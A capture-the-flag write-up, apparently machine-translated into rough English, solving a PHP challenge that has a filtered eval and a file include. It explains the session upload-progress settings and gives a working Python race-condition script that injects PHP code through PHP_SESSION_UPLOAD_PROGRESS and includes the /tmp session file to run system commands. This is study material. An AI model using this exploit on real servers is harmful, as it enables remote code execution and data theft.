Enter the topic : Source code

<?php 
if(!isset($_GET['mode'])){ 
    highlight_file(__file__); 
}else if($_GET['mode'] == "eval"){ 
    $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; 
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); 
    eval($shell); 
} 


if(isset($_GET['file'])){ 
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); 
    include $_GET['file']; 
} 


function filter($var){ 
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; 

    foreach($banned as $ban){ 
        if(strstr($var, $ban)) return True; 
    } 

    return False; 
} 

function checkNums($var){ 
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
    $cnt = 0; 
    for($i = 0; $i < strlen($alphanum); $i++){ 
        for($j = 0; $j < strlen($var); $j++){ 
            if($var[$j] == $alphanum[$i]){ 
                $cnt += 1; 
                if($cnt > 8) return True; 
            } 
        } 
    } 
    return False; 
} 
?>

Parameters can be carried out in the source code shell File execution of , Meeting parameters file The file contains , But it limits the characters , And right a-z0-9A-Z It was matched , Exist on exit(), To bypass these matches shell Of rce perform , There seems to be nothing I can do , Have a look first phpinfo() The content of .

The point is that ：

1,session.save_handler	files	files
2,session.save_path	/tmp	/tmp
3,session.serialize_handler	php	php
4,session.upload_progress.cleanup	On	On
5,session.upload_progress.enabled	On	On
6,session.upload_progress.freq	1%	1%
7,session.upload_progress.min_freq	1	1
8,session.upload_progress.name	PHP_SESSION_UPLOAD_PROGRESS	PHP_SESSION_UPLOAD_PROGRESS
9,session.upload_progress.prefix	upload_progress_	upload_progress_
10,session.use_cookies	On	On
11,session.use_only_cookies	On	On
12,session.use_strict_mode	Off	Off

The first line means session Store in the form of a file .

The second line says session The storage directory is /tmp Next .

The third line indicates that the processor for deserialization and serial number is PHP.

The fifth line says upload_progress Function start , That is, when the browser uploads files to the server ,php The details of this file upload will be stored in session in .

The fourth line indicates that after uploading the file ,php Will immediately clear the corresponding session Contents of the file .

In the sixth and seventh lines freq and min_freq Two items are used to set the update frequency of progress information on the server . Setting these two items reasonably can reduce the burden of the server .

In line 89 prefix and name Two items are used to set the progress information in session Variable name stored in / Key name .

The tenth line indicates the use of cookie Record sessionid.

The eleventh line indicates whether it is on the client only Use cookie To store the conversation ID.

The value in line 12 is off, Express Cookie Medium sessionid controllable .

Their thinking ：

When we define ourselves Cookie Medium PAPSESSID when ,PHP Create files for on the server and store them in tmp/sess_id. The server will initialize automatically Session, from (prefix+session.upload_progress.name) form , Due to twelve acts off, You can customize cookie Storage session file , Then control the contents of the file , Conduct file The file contains , because cleanup Is open , So we need to use conditional competition , stay php When it is cleared , Just visit the temporary tmp/sess_id The file is included .

That is, transmit such content :

  Script :

import requests
import threading

myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)

 Get the results :